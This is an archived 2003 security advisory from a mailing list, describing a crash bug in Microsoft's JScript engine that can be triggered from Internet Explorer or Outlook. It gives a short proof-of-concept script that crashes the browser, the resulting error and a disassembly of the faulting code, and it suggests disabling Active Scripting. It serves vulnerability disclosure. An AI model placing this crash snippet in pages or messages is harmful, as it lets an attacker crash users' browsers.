[NT] Microsoft's Windows Script Engine this/self.window() Security Flaw
From: SecuriTeam (support_at_securiteam.com)
Date: 05/21/03
- Previous message: SecuriTeam: "[TOOL] WebServerFP, Web Server Fingerprint Tool"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 21 May 2003 19:21:52 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
In the US?
Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!
Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -
Microsoft's Windows Script Engine this/self.window() Security Flaw
------------------------------------------------------------------------
SUMMARY
Microsoft Corp.'s Windows Script Engine within the Windows operating
system (OS) interprets and executes script code written in scripting
languages such as VBScript and JScript. Such script code can be used to
add functionality to web pages, or to automate tasks within the OS or a
program. Script code can be written in several different scripting
languages, such as Visual Basic Script, JScript, or JavaScript. By passing
malicious JavaScript via Internet Explorer (IE), Outlook, or Outlook
Express, remote attackers can crash Internet Explorer. The bug lies in the
Windows Script Engine's implementation of JScript that is provided by
jscript.dll (located in %SystemRoot%\system32).
DETAILS
Exploit:
The following snippet of JavaScript code demonstrates the existence of the
bug by crashing IE on a vulnerable Windows system:
< script>
this.window();
< /script>
Or....
< script>
self.window();
< /script>
IE crashes in Win2k... with the following error:
----------------------------------------------------
The instruction at "0x6b73aa15" referenced memory at "0x006f0063".
The memory could not be "read".
----------------------------------------------------
Disassembly... of JScript.dll[5.6.08513]...
6B73AA0A je 6B73AA25
6B73AA0C mov eax,dword ptr [ebp-64h]
6B73AA0F mov eax,dword ptr [eax+8]
6B73AA12 mov ecx,dword ptr [eax]
6B73AA14 push eax
6B73AA15 call dword ptr [ecx+8] <--- illegal op
6B73AA18 mov edx,dword ptr [ebp-4Ch]
6B73AA1B push edx
6B73AA1C call dword ptr ds:[6B773218h]
6B73AA22 add esp,4
6B73AA25 mov eax,dword ptr [ebp-34h]
6B73AA28 jmp 6B7213CB
6B73AA2D mov esi,dword ptr [ebp+18h]
We find that the value in ECX [i.e. value at memory location pointed by
eax is corrupted...].
Possible Solution:
Disable Active Scripting
ADDITIONAL INFORMATION
The information has been provided by <mailto:junkcode@gmx.net> Gregory R.
Panakkal.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[TOOL] WebServerFP, Web Server Fingerprint Tool"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
